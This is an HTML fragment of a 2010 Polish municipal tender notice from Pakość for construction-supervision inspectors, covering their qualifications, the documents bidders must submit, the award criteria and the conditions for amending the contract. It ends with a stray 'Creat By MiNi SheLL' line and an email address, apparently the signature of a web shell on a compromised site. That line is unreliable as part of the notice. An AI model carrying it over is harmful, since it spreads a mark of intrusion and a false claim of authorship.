a) Koordynator - Kierownik   Zespołu   Nadzoru   pełniący rolę koordynatora Inspektorów Nadzoru  
   Inwestorskiego (odpowiedzialny za przebieg nadzoru nad wykonawstwem robót) - minimum 1 osoba z  
   co najmniej   3   letnim doświadczeniem   na   stanowisku   inspektora   nadzoru   inwestorskiego   (w 
   rozumieniu   Prawa  Budowlanego)  lub  kierownika  budowy, z uprawnieniami do kierowania robotami 
   budowlanymi i  nadzorowania  w  specjalności  drogowej i lub  konstrukcyjno -  budowlanej.  Inżynier 
   Koordynator może pełnić funkcję jednego z Inspektorów Nadzoru, 

b) inspektor   nadzoru   odpowiedzialny   za   roboty   drogowe - minimum 1  osoba  z  uprawnieniami do 
    kierowania robotami budowlanymi i nadzorowania w specjalności drogowej oraz   doświadczeniem   w 
    branży minimum 3 lat (od uzyskania uprawnień) na stanowisku inspektora  nadzoru inwestorskiego  (w 
    rozumieniu Prawa Budowlanego) lub kierownika budowy, 

c) inspektor   nadzoru   inwestorskiego   robót   kanalizacyjnych - minimum  1 osoba z uprawnieniami do 
    nadzorowania robót w  zakresie sieci,  instalacji  i  urządzeń   cieplnych,   wentylacyjnych,   gazowych, 
    wodociągowych  i  kanalizacyjnych  oraz  doświadczeniem  w  branży  minimum  3 lata (od  uzyskania 
    uprawnień)  na  stanowisku  inspektora  nadzoru  inwestorskiego  lub  kierownika  budowy robót danej    
    branży, 

d) inspektor    nadzoru    inwestorskiego   ds.  sieci   i   instalacji   elektrycznych -obejmującej    instalacje 
    elektryczne,   napowietrzne   i   kablowe   linie  energetyczne, stacje i urządzenia  elektroenergetyczne i   
    oświetleniowe - minimum 1   osoba   z   uprawnieniami   do   nadzorowania   robót   sieci   i   instalacji   
    elektrycznych  j.w.   oraz   doświadczeniem   w   branży  minimum  3 lata (od uzyskania uprawnień) na 
    stanowisku inspektora nadzoru inwestorskiego lub kierownika budowy/robót danej branży, 


e) inspektor   nadzoru   inwestorskiego   branży   teletechnicznej - minimum 1 osoba z uprawnieniami do 
    nadzorowania robót w zakresie branży teletechnicznej oraz doświadczeniem w branży minimum 3 lata  
   (od uzyskania uprawnień)    na    stanowisku    inspektora    nadzoru   inwestorskiego   lub   kierownika 
   budowy/robót danej branży,

f) inspektor   nadzoru    inwestorskiego    robót   kubaturowych  - minimum 1  osoba    z   uprawnieniami  
   konstrukcyjno-budowlanymi    bez    ograniczeń    do    nadzorowania   robót    kubaturowych    oraz  
  doświadczeniem w branży minimum 3 lata (od uzyskania uprawnień) na stanowisku inspektora nadzoru 
   inwestorskiego lub kierownika budowy robót danej branży,

g) inspektor   nadzoru   inwestorskiego   ds. terenów  zielonych objętych ochroną konserwatora przyrody- 
    minimum  1   osoba   z   uprawnieniami   do   nadzorowania   prac   restauratorskich   polegających   na 
    zabezpieczeniu, uzupełnieniu, rekonstrukcji lub konserwacji parków zabytkowych albo innego  rodzaju 
    zorganizowanej zieleni zabytkowej oraz doświadczeniem  w  branży   minimum  3  lata  (od  uzyskania 
    uprawnień)   na   stanowisku   inspektora   nadzoru  inwestorskiego lub kierownika budowy robót danej      
    branży.

2) dla części I przedmiotu zamówienia:
a) inspektor    nadzoru    archeologicznego    (stały nadzór)- minimum  1  osoba    z    uprawnieniami    do  
    nadzorowania  prac ziemnych  oraz   doświadczeniem   w   branży   minimum   3   lata   (od   uzyskania  
    uprawnień)  na  stanowisku  inspektora  nadzoru  inwestorskiego  lub  kierownika  budowy robót  danej  
    branży



3) dla części III przedmiotu zamówienia: 
a) inspektor   nadzoru   konserwatorskiego   (stały nadzór)-  minimum   1   osoba   z   uprawnieniami   do 
    nadzorowania  prac konserwatorskich przy zabytkach nieruchomych oraz doświadczeniem   w   branży 
    minimum 3 lata (od uzyskania uprawnień)  na   stanowisku   inspektora   nadzoru   inwestorskiego   lub 
    kierownika budowy robót danej branży


Uwaga: 
Zamawiający dopuszcza łączenie funkcji inspektorów nadzoru poszczególnych branż wymienionych powyżej pod warunkiem wykazania się niezbędnymi uprawnieniami do kierowania i nadzorowania robotami w każdej z łączonej branży. (Jedna osoba może pełnić funkcję maksymalnie dwóch inspektorów). 
 Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą wykazać, że łącznie spełniają powyższy warunek.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sprawozdanie    finansowe   albo jego części, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również  z  opinią  odpowiednio  o  badanym   sprawozdaniu albo jego części, a w przypadku wykonawców nie  zobowiązanych  do  sporządzania   sprawozdania finansowego innych dokumentów określających obroty oraz zobowiązania  i  należności - za okres nie dłuższy nie ostatnie trzy lata obrotowe, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres;
Opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia- t.j. o wartości nie mniejszej niż oferowana przez wykonawcę kwota przedmiotowego zamówienia publicznego Ocena spełniania ww warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w niniejszej SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż ww. warunki wykonawca spełnił.W    przypadku złożenia oferty na poszczególne zadania -adekwatnie do oferty cenowej.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">sprawozdanie finansowe w całości, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego inny dokument określający obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 3 lata obrotowe</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający określa następujące warunki, w jakich przewiduje możliwość dokonania zmian  zawartej umowy:
3.1.Wykonawca może dokonywać zmiany kluczowych specjalistów, przedstawionych w ofercie wniosku o dopuszczenie do udziału w postępowaniu, jedynie za uprzednią pisemną zgodą zamawiającego, akceptującego nowego kluczowego specjalistę.
4.1.1.Wykonawca z własnej inicjatywy proponuje zmianę kluczowych specjalistów w następujących przypadkach:
1) śmierci, choroby lub zdarzeń losowych kluczowego specjalisty,
2) niewywiązywania się kluczowego specjalisty z obowiązków wynikających z umowy, 
3) jeżeli zmiana kluczowego specjalisty staje się konieczna z jakichkolwiek innych przyczyn niezależnych od wykonawcy (np. rezygnacji itp.)
4.1.2.Zamawiający może żądać od wykonawcy zmiany kluczowego specjalisty jeżeli uzna, że kluczowy specjalista nie wykonuje swych obowiązków wynikających z umowy.
4.1.3. W przypadku zmiany kluczowego specjalisty nowy kluczowy specjalista musi spełniać wymania określone dla danego specjalisty.
4.1.4. Wykonawca obowiązany jest zmienić kluczowego specjalistę zgodnie z żądaniem Zamawiającego w terminie wskazanym we wniosku zamawiającego.
4.2.W przypadku zwiększenia wykonywania robót budowlanych inspektor nadzoru nie będzie pobierał wynagrodzenia za okres zawieszenia robót budowlanych. W takim przypadku strony przedłużą wynikający z umowy okres wykonywania usługi o czas zawieszenia wykonania robót budowlanych.
4.3. Zamawiający przewiduje możliwość zmiany umowy, w przypadku gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy.
4.4. Zamawiający przewiduje możliwość zmiany umowy, w przypadku gdy konieczność wprowadzenia zmian będzie następstwem zmian wytycznych lub zaleceń Instytucji, która przyznała środki na sfinansowanie zamówienia lub/i umowy na roboty budowlane.
4.5. Zamawiający może nie wyrazić zgody na zmianę umowy, jeżeli proponowana zmiana  może wpłynąć na opóźnienie lub zwiększenie kosztów w wykonaniu niniejszej umowy albo umowy na roboty budowlane czy obniżenie jakości wykonania którejkolwiek z tych umów.
4.6. Inspektor nadzoru nie będzie uprawniony do żądanego przedłużenia terminu wykonania umowy i zwiększenia wynagrodzenia, jeżeli zmiana jest wymuszona uchybieniem czy naruszeniem umowy przez inspektora nadzoru. W takim przypadku koszty dodatkowe związane z takimi zmianami ponosi inspektor nadzoru.
4.7. Zmiana formy zabezpieczenia należytego wykonania umowy następuje zgodnie z art. 149 ustawy Prawo zamówień publicznych.
4.8. Wyniknie konieczność przedłużenia terminu umownego z powodu:
- działania siły wyższej, tj. wyjątkowego zdarzenia lub okoliczności (np. przeszkody atmosferyczne  o charakterze katastrof). Nie uważa się za czynnik zakłócający wpływ czynników atmosferycznych w czasie realizacji usługi nadzoru nad wykonywaniem robót budowlanych, który przy składaniu ofert musi być normalnie brany pod uwagę.
-  z przyczyn niezależnych od Zamawiającego tj. z powodu:
a. nadzwyczajnych zdarzeń gospodarczych niezależnych od Zamawiającego, których Zamawiający nie mógł przewidzieć w chwili zawarcia umowy
b. decyzji służb konserwatorskich mających wpływ na przesunięcie terminu realizacji robót  takich jak wstrzymanie budowy, konieczność wykonania dodatkowych badań archeologicznych /konserwatorskich.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.pakosc.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski
ul. Rynek 4 88-170 Pakości  pok. nr 12 (I piętro).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.11.2010 godzina 09:30, miejsce: Urząd Miejski
ul. Rynek 4 88-170 Pakości  pok. nr 5  (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 60 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest finansowane przy udziale środków pochodzących z Europejskiego Funduszu Rozwoju Regionalnego, w ramach Regionalnego Programu Operacyjnego Województwa Kujawsko- Pomorskiego na lata 2007 -2013 oraz ze środków własnych Gminy Pakość..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com